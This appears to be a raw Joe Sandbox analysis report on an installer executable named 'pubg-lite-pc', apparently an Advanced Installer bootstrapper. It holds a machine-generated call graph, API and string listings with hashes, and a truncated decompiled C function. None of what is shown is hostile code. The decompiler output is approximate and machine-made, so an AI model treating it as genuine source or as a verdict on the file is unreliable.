928fc0 2 API calls 63511->63515 63519 9eb1a4 63511->63519 63514 9eb1f0 63512->63514 63513->63511 63516 928b00 26 API calls 63514->63516 63517 9eb291 63515->63517 63518 9eb202 63516->63518 63520 9eb2d6 63517->63520 63521 9eb315 WriteFile 63517->63521 63518->63481 63519->63481 63524 9292f0 36 API calls 63520->63524 63522 9eb34c 63521->63522 63523 9eb332 63521->63523 63525 9eb140 51 API calls 63522->63525 63526 9292f0 36 API calls 63523->63526 63527 9eb2db 63524->63527 63525->63527 63526->63527 63527->63481 63528 928fc0 2 API calls 63527->63528 63530 9eb2e3 63527->63530 63529 9eb387 63528->63529 63531 9292f0 36 API calls 63529->63531 63530->63481 63532 9eb3ca 63531->63532 63533 9eb43a 63532->63533 63534 9eb3d0 63532->63534 63535 928fc0 2 API calls 63533->63535 63538 9eb3fd 63534->63538 63539 9eb3f2 63534->63539 63536 9eb444 63535->63536 63537 9eacb0 51 API calls 63536->63537 63545 9eb488 63537->63545 63549 928e70 26 API calls 63538->63549 63548 935370 34 API calls 63539->63548 63542 9eb3fb 63543 939140 30 API calls 63542->63543 63544 9eb425 63543->63544 63544->63481 63545->63481 63546->63496 63547->63496 63548->63542 63549->63542 63550->63285 63551->63283 63552->63296 63553->63306 63554->63308 63555->63327 63558->63318 63560 9292f0 36 API calls 63559->63560 63561 9f0798 63560->63561 63562 9f08f9 63561->63562 63566 9292f0 36 API calls 63561->63566 63563 928fc0 2 API calls 63562->63563 63564 9f0903 63563->63564 63581 9f0a70 IsWindow 63564->63581 63568 9f07bb 63566->63568 63567 9f0918 63567->63340 63568->63562 63569 9292f0 36 API calls 63568->63569 63570 9f0827 63569->63570 63570->63562 63571 9292f0 36 API calls 63570->63571 63572 9f089c 63571->63572 63572->63562 63573 9292f0 36 API calls 63572->63573 63574 9f08be 63573->63574 63574->63562 63575 9f08c2 63574->63575 63578 9f5ef0 63575->63578 63577 9f08dd 63577->63340 63588 9e9e10 63578->63588 63582 9f0acc EndDialog 63581->63582 63583 9f0ad7 63581->63583 63582->63583 63585 9f0bb3 63583->63585 63642 a43407 10 API calls 63583->63642 63586 9f0c20 63585->63586 63643 a43407 10 API calls 63585->63643 63586->63567 63595 9e9f50 63588->63595 63591 a45a61 4 API calls 63593 9e9e60 63591->63593 63592 9e9ef5 63592->63577 63593->63592 63603 a45a17 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63593->63603 63596 9e9f87 63595->63596 63602 9e9e39 63595->63602 63597 a45a61 4 API calls 63596->63597 63598 9e9f91 63597->63598 63598->63602 63604 9e9ff0 63598->63604 63602->63591 63602->63592 63603->63592 63605 9ea046 RegOpenKeyExW 63604->63605 63606 9ea06c RegQueryValueExW RegQueryValueExW 63605->63606 63607 9ea306 63605->63607 63608 9ea0cf RegQueryValueExW 63606->63608 63609 9ea12b RegQueryValueExW 63606->63609 63610 9ea332 63607->63610 63611 9ea321 RegCloseKey 63607->63611 63608->63609 63612 9ea103 63608->63612 63614 9ea16e 63609->63614 63615 9ea193 RegQueryValueExW 63609->63615 63613 a4566b 5 API calls 63610->63613 63611->63610 63612->63609 63612->63612 63616 9e9fba 63613->63616 63614->63615 63617 9ea1e5 RegQueryValueExW 63615->63617 63618 9ea1c0 63615->63618 63630 a45a17 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63616->63630 63619 9ea212 63617->63619 63618->63617 63620 9ea2c6 63619->63620 63623 a45a61 4 API calls 63619->63623 63621 9ea2fa 63620->63621 63622 9ea2d0 GetCurrentProcess IsWow64Process 63620->63622 63631 9ea350 63621->63631 63622->63621 63624 9ea2ee 63622->63624 63625 9ea289 63623->63625 63624->63621 63625->63620 63627 9ea295 GetModuleHandleW GetProcAddress 63625->63627 63641 a45a17 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63627->63641 63629 9ea2c3 63629->63620 63630->63602 63632 9ea3a8 RegOpenKeyExW 63631->63632 63633 9ea3ce RegQueryValueExW 63632->63633 63638 9ea480 63632->63638 63634 9ea44f RegQueryValueExW 63633->63634 63640 9ea401 63633->63640 63634->63638 63635 9ea65e 63637 a4566b 5 API calls 63635->63637 63636 9ea64d RegCloseKey 63636->63635 63639 9ea676 63637->63639 63638->63635 63638->63636 63639->63607 63640->63634 63641->63629 63642->63585 63643->63586 63644->63353 63645->63362 63646->63369 63647->63367 63649->63394 63650->63396 63651 9f0080 63662 9efbf0 63651->63662 63654 9f013e GetLastError 63661 9f00ea 63654->63661 63655 9f00da 63656 9d1790 3 API calls 63655->63656 63659 9f00e3 63656->63659 63657 9f0157 63658 9f0150 DeleteFileW 63658->63657 63660 9f00f1 GetFileVersionInfoW 63659->63660 63659->63661 63660->63654 63660->63661 63661->63657 63661->63658 63663 9e9f50 29 API calls 63662->63663 63664 9efc2e 63663->63664 63665 a45a61 4 API calls 63664->63665 63667 9efcda 63664->63667 63669 9efc53 63665->63669 63666 9efd1e SHGetFolderPathW 63673 9efd3c 63666->63673 63667->63666 63668 9efe9a 63667->63668 63670 a4566b 5 API calls 63668->63670 63669->63667 63685 a45a17 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63669->63685 63671 9efec0 GetFileVersionInfoSizeW 63670->63671 63671->63654 63671->63655 63673->63668 63674 9efdba GetTempPathW 63673->63674 63681 a47980 63674->63681 63678 9efe0e Wow64DisableWow64FsRedirection CopyFileW 63679 9efe60 63678->63679 63679->63668 63680 9efe78 Wow64RevertWow64FsRedirection 63679->63680 63680->63668 63682 9efde2 GetTempFileNameW 63681->63682 63683 9eff30 63682->63683 63684 9eff3a 63683->63684 63684->63678 63685->63667 63686 931031 63687 9310b7 63686->63687 63688 9310c6 CallWindowProcW 63687->63688 63689 9310dc GetWindowLongW CallWindowProcW 63687->63689 63692 93112b 63687->63692 63688->63692 63690 931110 GetWindowLongW 63689->63690 63689->63692 63691 93111d SetWindowLongW 63690->63691 63690->63692 63691->63692 63693 6d9970be 63695 6d9970fa 63693->63695 63696 6d9970cc 63693->63696 63694 6d9970e7 RtlAllocateHeap 63694->63695 63694->63696 63696->63694 63696->63695 63697 926575 63702 9abaf0 63697->63702 63701 926592 63703 9abb28 63702->63703 63707 9acaa0 63703->63707 63706 a45919 27 API calls 63706->63701 63720 9ae310 63707->63720 63710 a456ad 3 API calls 63711 9acafb 63710->63711 63729 a43b8d 63711->63729 63713 9acb07 63739 9acd30 63713->63739 63716 9acb41 63717 926588 63716->63717 63743 a44231 7 API calls 63716->63743 63717->63706 63718 9ae310 28 API calls 63718->63716 63721 9acaf4 63720->63721 63722 9ae32a 63720->63722 63721->63710 63723 9ae342 63722->63723 63724 a47ada RaiseException 63722->63724 63744 9adc70 28 API calls 63723->63744 63724->63723 63726 9ae378 63727 a47ada RaiseException 63726->63727 63728 9ae387 63727->63728 63730 a43b99 63729->63730 63745 a43dcf 63730->63745 63734 a43bb7 63752 a43d15 38 API calls 63734->63752 63736 a43bbf 63753 9a9d40 13 API calls 63736->63753 63737 a43bd5 63737->63713 63740 9acd75 63739->63740 63756 9a91d0 63740->63756 63742 9acb27 63742->63716 63742->63718 63743->63717 63744->63726 63746 a43de5 63745->63746 63747 a43dde 63745->63747 63748 a43ba4 63746->63748 63755 a452ab EnterCriticalSection 63746->63755 63754 a531b9 6 API calls 63747->63754 63748->63737 63751 a43cf2 15 API calls 63748->63751 63751->63734 63752->63736 63753->63737 63754->63748 63755->63748 63757 a43dcf 7 API calls 63756->63757 63758 9a921f 63757->63758 63759 a43dcf 7 API calls 63758->63759 63761 9a9241 63758->63761 63759->63761 63760 9a92b1 63760->63742 63761->63760 63762 a456ad 3 API calls 63761->63762 63763 9a92bf 63762->63763 63773 9a99c0 63763->63773 63774 a43dcf 7 API calls 63773->63774 63775 9a99f0 63774->63775 63776 9a9a4c 63775->63776 63777 9a9a71 63775->63777 63786 a43c8d 63776->63786 63795 a43a55 25 API calls 63777->63795 63796 a52e96 63786->63796 63803 a586e3 63796->63803 63824 a57ffa LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63803->63824 63805 a586e8 63825 a58014 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63805->63825 63807 a586ed 63826 a5802e LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63807->63826 63809 a586f2 63827 a58048 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63809->63827 63811 a586f7 63828 a58062 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63811->63828 63813 a586fc 63829 a5807c LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63813->63829 63815 a58701 63830 a58096 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63815->63830 63817 a58706 63831 a580b0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63817->63831 63819 a5870b 63832 a580e4 63819->63832 63823 a58715 63823->63823 63824->63805 63825->63807 63826->63809 63827->63811 63828->63813 63829->63815 63830->63817 63831->63819 63833 a581df 5 API calls 63832->63833 63834 a580fa 63833->63834 63835 a580ca LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 63834->63835 63835->63823 63836 9a6170 63837 9a61bb 63836->63837 63839 9a61a8 63836->63839 63844 99b120 55 API calls 63837->63844 63842 a4566b 5 API calls 63839->63842 63840 9a61c5 63845 927f30 24 API calls 63840->63845 63843 9a620a 63842->63843 63844->63840 63845->63839 63846 9b2830 GetTempPathW 63847 9b2889 63846->63847 63848 9b28d3 63846->63848 63849 9292f0 36 API calls 63847->63849 63850 9b28ef 63848->63850 63851 9b2952 63848->63851 63852 9b288e 63849->63852 63854 9292f0 36 API calls 63850->63854 63869 a45c59 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 63851->63869 63855 9b2957 63852->63855 63860 9b2896 63852->63860 63857 9b28fb 63854->63857 63856 928fc0 2 API calls 63855->63856 63858 9b2961 63856->63858 63857->63855 63859 9b2901 63857->63859 63862 9b292c 63859->63862 63863 9b291c 63859->63863 63861 a4566b 5 API calls 63860->63861 63864 9b28cb 63861->63864 63868 928e70 26 API calls 63862->63868 63867 935370 34 API calls 63863->63867 63867->63860 63868->63860 63869->63855 63870 a42d0a 63896 a42a6b 63870->63896 63872 a42d1a 63873 a42d77 63872->63873 63876 a42d9b 63872->63876 63905 a42ca8 6 API calls 63873->63905 63875 a42d82 RaiseException 63891 a42f70 63875->63891 63877 a42e13 LoadLibraryExA 63876->63877 63878 a42f42 63876->63878 63879 a42e74 63876->63879 63882 a42e86 63876->63882 63877->63879 63880 a42e26 GetLastError 63877->63880 63908 a42ca8 6 API calls 63878->63908 63879->63882 63883 a42e7f FreeLibrary 63879->63883 63884 a42e4f 63880->63884 63887 a42e39 63880->63887 63881 a42ee4 GetProcAddress 63881->63878 63886 a42ef4 GetLastError 63881->63886 63882->63878 63882->63881 63883->63882 63906 a42ca8 6 API calls 63884->63906 63889 a42f07 63886->63889 63887->63879 63887->63884 63888 a42e5a RaiseException 63888->63891 63889->63878 63907 a42ca8 6 API calls 63889->63907 63893 a42f28 RaiseException 63894 a42a6b 6 API calls 63893->63894 63895 a42f3f 63894->63895 63895->63878 63897 a42a77 63896->63897 63898 a42a9d 63896->63898 63909 a42b11 GetModuleHandleW GetProcAddress GetProcAddress 63897->63909 63898->63872 63900 a42a7c 63901 a42a98 63900->63901 63910 a42c3a VirtualQuery GetSystemInfo VirtualProtect 63900->63910 63911 a42a9e GetModuleHandleW GetProcAddress GetProcAddress 63901->63911 63904 a42ce3 63904->63872 63905->63875 63906->63888 63907->63893 63908->63891 63909->63900 63910->63901 63911->63904 63912 927de0 63913 927dea FindCloseChangeNotification 63912->63913 63914 927df8 63912->63914 63913->63914 63915 6d964820 SHGetFolderPathW GetVolumeInformationW 63916 6d9648a8 63915->63916 63917 6d980de0 63918 6d980eb2 63917->63918 63919 6d980e22 63917->63919 63919->63918 63921 6d980ee0 63919->63921 63922 6d980f35 RegOpenKeyExW 63921->63922 63923 6d980f58 RegQueryValueExW RegQueryValueExW 63922->63923 63924 6d981197 63922->63924 63925 6d980f9d RegQueryValueExW 63923->63925 63926 6d980ff6 RegQueryValueExW 63923->63926 63927 6d9811ba 63924->63927 63928 6d9811ac RegCloseKey 63924->63928 63925->63926 63932 6d980fd1 63925->63932 63929 6d981048 RegQueryValueExW 63926->63929 63933 6d98102a 63926->63933 63927->63918 63928->63927 63930 6d981084 RegQueryValueExW 63929->63930 63931 6d981069 63929->63931 63934 6d9810a8 63930->63934 63931->63930 63932->63926 63933->63929 63935 6d981160 63934->63935 63939 6d98112f GetModuleHandleW GetProcAddress 63934->63939 63936 6d98116a GetCurrentProcess 63935->63936 63937 6d98117e 63935->63937 63936->63937 63941 6d9811e0 63937->63941 63940 6d98115d 63939->63940 63940->63935 63942 6d981237 RegOpenKeyExW 63941->63942 63943 6d98125a RegQueryValueExW 63942->63943 63948 6d981331 63942->63948 63944 6d98130c RegQueryValueExW 63943->63944 63947 6d981288 63943->63947 63944->63948 63945 6d9816f1 63945->63924 63946 6d9816e3 RegCloseKey 63946->63945 63947->63944 63948->63945 63948->63946 63949 99b720 63950 99b757 63949->63950 63956 99b797 63949->63956 63951 a45a61 4 API calls 63950->63951 63952 99b761 63951->63952 63952->63956 63957 a45919 27 API calls 63952->63957 63954 99b783 63958 a45a17 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 63954->63958 63957->63954 63958->63956 63959 9fe5a0 63960 9feddb 63959->63960 63973 9fe606 63959->63973 63961 a4566b 5 API calls 63960->63961 63962 9fee06 63961->63962 63963 a456ad 3 API calls 63963->63973 63967 9ff6b0 28 API calls 63967->63973 63972 927f30 24 API calls 63972->63973 63973->63960 63973->63963 63973->63967 63973->63972 63974 9fe6f8 63973->63974 63976 927c60 29 API calls 63973->63976 63987 9fd470 35 API calls 63973->63987 63988 928860 28 API calls 63973->63988 63989 928620 28 API calls 63973->63989 63990 9fdd80 63973->63990 64003 9a9f10 29 API calls 63973->64003 64030 9fff00 28 API calls 63973->64030 64031 9ffc50 28 API calls 63973->64031 64032 9478b0 24 API calls 63973->64032 63974->63973 64002 927c60 29 API calls 63974->64002 64004 927c60 29 API calls 63974->64004 64005 927c60 29 API calls 63974->64005 64006 927c60 29 API calls 63974->64006 64007 9ad4d0 28 API calls 63974->64007 64008 927f30 24 API calls 63974->64008 64009 a00490 28 API calls 63974->64009 64010 9b22f0 63974->64010 64028 9ffa20 28 API calls 63974->64028 64029 927690 24 API calls 63974->64029 63976->63973 63987->63973 63988->63973 63989->63973 63991 9fddcf CreateFileW 63990->63991 63992 9fddcd 63990->63992 63993 9fddef 63991->63993 63992->63991 63994 9b22f0 28 API calls 63993->63994 63995 9fde1e 63994->63995 63996 9fde6a WriteFile 63995->63996 63997 9fde87 63995->63997 63996->63995 63996->63997 64033 927690 24 API calls 63997->64033 63999 9fde99 64000 9fdeae CloseHandle 63999->64000 64001 9fdebc 63999->64001 64000->64001 64001->63974 64002->63974 64003->63973 64004->63973 64005->63973 64006->63973 64007->63974 64008->63974 64009->63974 64011 9b232e 64010->64011 64012 9b2300 64010->64012 64013 9b234a 64011->64013 64016 a456ad 3 API calls 64011->64016 64014 9b235b 64012->64014 64015 9b2307 64012->64015 64013->63974 64034 927be0 28 API calls 64014->64034 64018 a456ad 3 API calls 64015->64018 64019 9b2338 64016->64019 64020 9b230d 64018->64020 64019->63974 64021 9b2316 64020->64021 64035 a4a21f 24 API calls 64020->64035 64021->63974 64028->63974 64029->63973 64030->63973 64031->63973 64032->63973 64033->63999 64034->64020 64036 a4335b GetProcessHeap HeapAlloc 64037 a43377 64036->64037 64038 a43373 64036->64038 64046 a430ed 64037->64046 64040 a43382 64041 a43392 64040->64041 64042 a4339e 64040->64042 64044 a433bc 64041->64044 64045 a433ab GetProcessHeap HeapFree 64041->64045 64060 a431f9 15 API calls 64042->64060 64045->64038 64047 a43107 LoadLibraryExA 64046->64047 64048 a430fa DecodePointer 64046->64048 64049 a43120 64047->64049 64050 a43198 64047->64050 64048->64040 64061 a4319d GetProcAddress EncodePointer 64049->64061 64050->64040 64052 a43130 64052->64050 64062 a4319d GetProcAddress EncodePointer 64052->64062 64054 a43147 64054->64050 64063 a4319d GetProcAddress EncodePointer 64054->64063 64056 a4315e 64056->64050 64064 a4319d GetProcAddress EncodePointer 64056->64064 64058 a43175 64058->64050 64059 a4317c DecodePointer 64058->64059 64059->64050 64060->64041 64061->64052 64062->64054 64063->64056 64064->64058

                                                                                                Executed Functions

                                                                                                Function 009C7100 Relevance: 24.5, APIs: 2, Strings: 11, Instructions: 1737COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                  • Part of subcall function 00935370: FindResourceW.KERNEL32(00000000,?,00000006,?,000000FF,?,009EB3FB,\\.\pipe\ToServer,?,?,?,00000000,00A7C506,000000FF,?,80004005), ref: 00935397
                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,00000001), ref: 009C72F7
                                                                                                • SetEvent.KERNEL32(?), ref: 009C7355
                                                                                                  • Part of subcall function 009D1640: DeleteFileW.KERNEL32(?,00000000,00000000,?,00000000,80004005,?,?,?,F4D3B90A), ref: 009D166B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Event$DeleteFileFindHeapProcessResource
                                                                                                • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\
                                                                                                • API String ID: 1192275139-297406034
                                                                                                • Opcode ID: 117304c1b719d515b2c3c463cd616a94bbd46b3786c3359dfa2db1341fdd41db
                                                                                                • Instruction ID: bbddedef2d95d03f06eacbf6624c412d562617b7bac4d06354f321d9e240febd
                                                                                                • Opcode Fuzzy Hash: 117304c1b719d515b2c3c463cd616a94bbd46b3786c3359dfa2db1341fdd41db
                                                                                                • Instruction Fuzzy Hash: 8EE2B030900649DFDB00DFA8C849BAEF7B9FF95314F14826DE415AB292EB749E05CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009DD980 Relevance: 16.6, APIs: 11, Instructions: 117memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1089 9dd980-9dd9dd GetCurrentProcess OpenProcessToken 1091 9dd9ec-9dda0d GetTokenInformation 1089->1091 1092 9dd9df-9dd9e7 GetLastError 1089->1092 1094 9dda0f-9dda18 GetLastError 1091->1094 1095 9dda3b-9dda3f 1091->1095 1093 9ddaaa-9ddabd 1092->1093 1096 9ddacd-9ddae9 call a4566b 1093->1096 1097 9ddabf-9ddac6 CloseHandle 1093->1097 1098 9dda8e GetLastError 1094->1098 1099 9dda1a-9dda39 call 9d1790 GetTokenInformation 1094->1099 1095->1098 1100 9dda41-9dda70 AllocateAndInitializeSid 1095->1100 1097->1096 1101 9dda94 1098->1101 1099->1095 1099->1098 1100->1101 1102 9dda72-9dda8c EqualSid FreeSid 1100->1102 1105 9dda96-9ddaa3 call a45f29 1101->1105 1102->1105 1105->1093
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 009DD9C8
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 009DD9D5
                                                                                                • GetLastError.KERNEL32 ref: 009DD9DF
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,000000FF), ref: 009DDA09
                                                                                                • GetLastError.KERNEL32 ref: 009DDA0F
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),000000FF,000000FF,000000FF,000000FF), ref: 009DDA35
                                                                                                • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009DDA68
                                                                                                • EqualSid.ADVAPI32(00000000,?), ref: 009DDA77
                                                                                                • FreeSid.ADVAPI32(?), ref: 009DDA86
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009DDAC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
                                                                                                • String ID:
                                                                                                • API String ID: 695978879-0
                                                                                                • Opcode ID: 3e555cbde27d20e8416fcb73bf773a47a41d0bd2f6286d0a34805f6f1fa38598
                                                                                                • Instruction ID: 4e6decb322d25b366807be8515b730835317b1c37de1f5b8d8ca898c462ec5ab
                                                                                                • Opcode Fuzzy Hash: 3e555cbde27d20e8416fcb73bf773a47a41d0bd2f6286d0a34805f6f1fa38598
                                                                                                • Instruction Fuzzy Hash: 56410471941209EBDF10DFE4CD49BEEBBB8EF08310F148516E411A32A0DB799A05CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B7020 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(ComCtl32.dll,F4D3B90A,00000000,?,00000000), ref: 009B705E
                                                                                                • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 009B7081
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 009B70FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                • API String ID: 145871493-764666640
                                                                                                • Opcode ID: 27cac01875940b50218a3e3ee7f2d126aa99688419b3a89695e0ab3c1b72e84e
                                                                                                • Instruction ID: ad7688b0963255ac0ee4440ac91c2a70bda6475b2a7a8c03911b4c1b4090568e
                                                                                                • Opcode Fuzzy Hash: 27cac01875940b50218a3e3ee7f2d126aa99688419b3a89695e0ab3c1b72e84e
                                                                                                • Instruction Fuzzy Hash: 8A318471A04259ABDB15DF99CD44BAFBFFCFB48720F00466AF915A3281D7B58D008BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009DB9D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009DBAAA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: DiskFreeSpace
                                                                                                • String ID: \$\$\
                                                                                                • API String ID: 1705453755-3791832595
                                                                                                • Opcode ID: 665e6e1c24fec2426afc43e79db779193b5ed8cd7e6a1c8acf8ae82d0506a914
                                                                                                • Instruction ID: a96ab6785c4bc6e1f0022826340a7cde1a1ded799e152c797a926d3ca421429f
                                                                                                • Opcode Fuzzy Hash: 665e6e1c24fec2426afc43e79db779193b5ed8cd7e6a1c8acf8ae82d0506a914
                                                                                                • Instruction Fuzzy Hash: C541E162E80215C6CB30DF648441AABB3E8FF98354F168A2FE8D897240F7349D8583C6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D982CF0 Relevance: 6.1, APIs: 4, Instructions: 83fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 64%
                                                                                                			E6D982CF0(WCHAR** __ecx, void* __edi, void* __esi) {
				void* _v8;
				void* _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v612;
				void* _v616;
				intOrPtr _v620;
				void* _v636;
				char _v644;
				char _v648;
				void* __ebx;
				signed int _t34;
				signed int _t35;
				signed int _t41;
				signed int* _t45;
				signed int _t46;
				signed int _t47;
				intOrPtr* _t49;
				signed int _t56;
				signed int _t57;
				intOrPtr _t60;
				signed int _t65;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				WCHAR* _t76;
				signed int _t79;
				void* _t81;
				signed int _t82;

				_t74 = __edi;
				_push(0xffffffff);
				_push(0x6d9b90a0);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0x25c;
				_t34 =  *0x6d9e5024; // 0xe85bfa76
				_t35 = _t34 ^ _t79;
				_v20 = _t35;
				_push(_t35);
				_t36 =  &_v16;
				 *[fs:0x0] =  &_v16;
				_t76 =  *__ecx;
				_t60 =  *((intOrPtr*)(_t76 - 0xc));
				if(_t60 != 0) {
					if(_t60 < 2) {
						L15:
						goto L16;
					} else {
						if(_t60 < 0) {
							L17:
							E6D966820(0x80070057);
							asm("int3");
							_push(_t79);
							_push(0xffffffff);
							_push(0x6d9b90e5);
							_push( *[fs:0x0]);
							_push(_t60);
							_push(_t56);
							_t41 =  *0x6d9e5024; // 0xe85bfa76
							_push(_t41 ^ _t82);
							 *[fs:0x0] =  &_v644;
							_push(4);
							_t45 = L6D97E150(_t56, _t74,  &_v648, 0);
							_v636 = 0;
							_t65 = L"\\\\?\\";
							_t46 =  *_t45;
							while(1) {
								_t71 =  *_t46;
								if(_t71 !=  *_t65) {
									break;
								}
								if(_t71 == 0) {
									L23:
									_t47 = 0;
								} else {
									_t73 =  *((intOrPtr*)(_t46 + 2));
									if(_t73 !=  *((intOrPtr*)(_t65 + 2))) {
										break;
									} else {
										_t46 = _t46 + 4;
										_t65 = _t65 + 4;
										if(_t73 != 0) {
											continue;
										} else {
											goto L23;
										}
									}
								}
								L25:
								_t57 = _t56 & 0xffffff00 | _t47 == 0x00000000;
								_v12 = 0xffffffff;
								_t49 = _v24 + 0xfffffff0;
